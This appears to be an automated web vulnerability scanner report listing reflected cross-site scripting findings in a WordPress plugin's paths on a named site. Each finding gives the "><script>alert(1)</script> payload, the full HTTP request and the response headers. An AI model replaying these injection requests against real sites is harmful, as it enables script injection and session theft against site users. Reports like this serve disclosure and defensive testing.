HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:19:12 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:19:12 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44559
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
1.149. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.installsoftware.com
Path:
/wp-content/plugins/sexybookmarks/css/comfeed.css
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fc0d"><script>alert(1)</script>0cabb235182 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6fc0d\"><script>alert(1)</script>0cabb235182 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sexybookmarks/css/comfeed.css?6fc0d"><script>alert(1)</script>0cabb235182=1 HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:16:28 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Mon, 31 Jan 2011 20:16:28 GMT Vary: User-Agent,Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44594
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98b6c"><script>alert(1)</script>69a51346be6 was submitted in the REST URL parameter 1. This input was echoed as 98b6c\"><script>alert(1)</script>69a51346be6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content98b6c"><script>alert(1)</script>69a51346be6/plugins/sexybookmarks/css/comfeed.css/page/2 HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:18:28 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:18:28 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47416
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f981d"><script>alert(1)</script>66ebbffd62 was submitted in the REST URL parameter 2. This input was echoed as f981d\"><script>alert(1)</script>66ebbffd62 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/pluginsf981d"><script>alert(1)</script>66ebbffd62/sexybookmarks/css/comfeed.css/page/2 HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:19:00 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:19:01 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47413
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d392d"><script>alert(1)</script>5023067eea0 was submitted in the REST URL parameter 3. This input was echoed as d392d\"><script>alert(1)</script>5023067eea0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sexybookmarksd392d"><script>alert(1)</script>5023067eea0/css/comfeed.css/page/2 HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:19:33 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:19:34 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47416
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1357e"><script>alert(1)</script>5f4f3762d1b was submitted in the REST URL parameter 4. This input was echoed as 1357e\"><script>alert(1)</script>5f4f3762d1b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sexybookmarks/css1357e"><script>alert(1)</script>5f4f3762d1b/comfeed.css/page/2 HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:19:43 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:19:44 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47416
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30032"><script>alert(1)</script>7a12e41d703 was submitted in the REST URL parameter 5. This input was echoed as 30032\"><script>alert(1)</script>7a12e41d703 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sexybookmarks/css/comfeed.css30032"><script>alert(1)</script>7a12e41d703/page/2 HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:19:57 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:19:58 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47416
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8170"><script>alert(1)</script>c8241c08e36 was submitted in the REST URL parameter 6. This input was echoed as e8170\"><script>alert(1)</script>c8241c08e36 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sexybookmarks/css/comfeed.css/pagee8170"><script>alert(1)</script>c8241c08e36/2 HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:20:20 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:20:21 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44573
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c4f9"><script>alert(1)</script>fc715ef3f3a was submitted in the REST URL parameter 7. This input was echoed as 2c4f9\"><script>alert(1)</script>fc715ef3f3a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sexybookmarks/css/comfeed.css/page/22c4f9"><script>alert(1)</script>fc715ef3f3a HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:20:28 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:20:29 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44573
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
1.157. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82fa0"><script>alert(1)</script>772b381c7a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 82fa0\"><script>alert(1)</script>772b381c7a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sexybookmarks/css/comfeed.css/page/2?82fa0"><script>alert(1)</script>772b381c7a8=1 HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:17:32 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Mon, 31 Jan 2011 20:17:33 GMT Vary: User-Agent,Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47454
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9403f"><script>alert(1)</script>03e6737652b was submitted in the REST URL parameter 1. This input was echoed as 9403f\"><script>alert(1)</script>03e6737652b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content9403f"><script>alert(1)</script>03e6737652b/plugins/sexybookmarks/js/shareaholic-perf.js HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:16:49 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:16:50 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44573
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbed5"><script>alert(1)</script>2ed32fd7284 was submitted in the REST URL parameter 2. This input was echoed as dbed5\"><script>alert(1)</script>2ed32fd7284 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/pluginsdbed5"><script>alert(1)</script>2ed32fd7284/sexybookmarks/js/shareaholic-perf.js HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:17:21 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:17:21 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44573
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 270ef"><script>alert(1)</script>6359b9f266f was submitted in the REST URL parameter 3. This input was echoed as 270ef\"><script>alert(1)</script>6359b9f266f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sexybookmarks270ef"><script>alert(1)</script>6359b9f266f/js/shareaholic-perf.js HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:17:45 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:17:45 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44573
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d48cf"><script>alert(1)</script>a0e85372bab was submitted in the REST URL parameter 4. This input was echoed as d48cf\"><script>alert(1)</script>a0e85372bab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sexybookmarks/jsd48cf"><script>alert(1)</script>a0e85372bab/shareaholic-perf.js HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:18:16 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:18:17 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44573
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bb79"><script>alert(1)</script>8b65169f2a0 was submitted in the REST URL parameter 5. This input was echoed as 6bb79\"><script>alert(1)</script>8b65169f2a0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js6bb79"><script>alert(1)</script>8b65169f2a0 HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:18:48 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:18:49 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44573
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
1.163. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26cbc"><script>alert(1)</script>8d0b33eac8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 26cbc\"><script>alert(1)</script>8d0b33eac8c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js?26cbc"><script>alert(1)</script>8d0b33eac8c=1 HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:15:46 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Mon, 31 Jan 2011 20:15:47 GMT Vary: User-Agent,Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44608
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c67a"><script>alert(1)</script>2ac3708dc28 was submitted in the REST URL parameter 1. This input was echoed as 6c67a\"><script>alert(1)</script>2ac3708dc28 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content6c67a"><script>alert(1)</script>2ac3708dc28/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:17:33 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:17:34 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47437
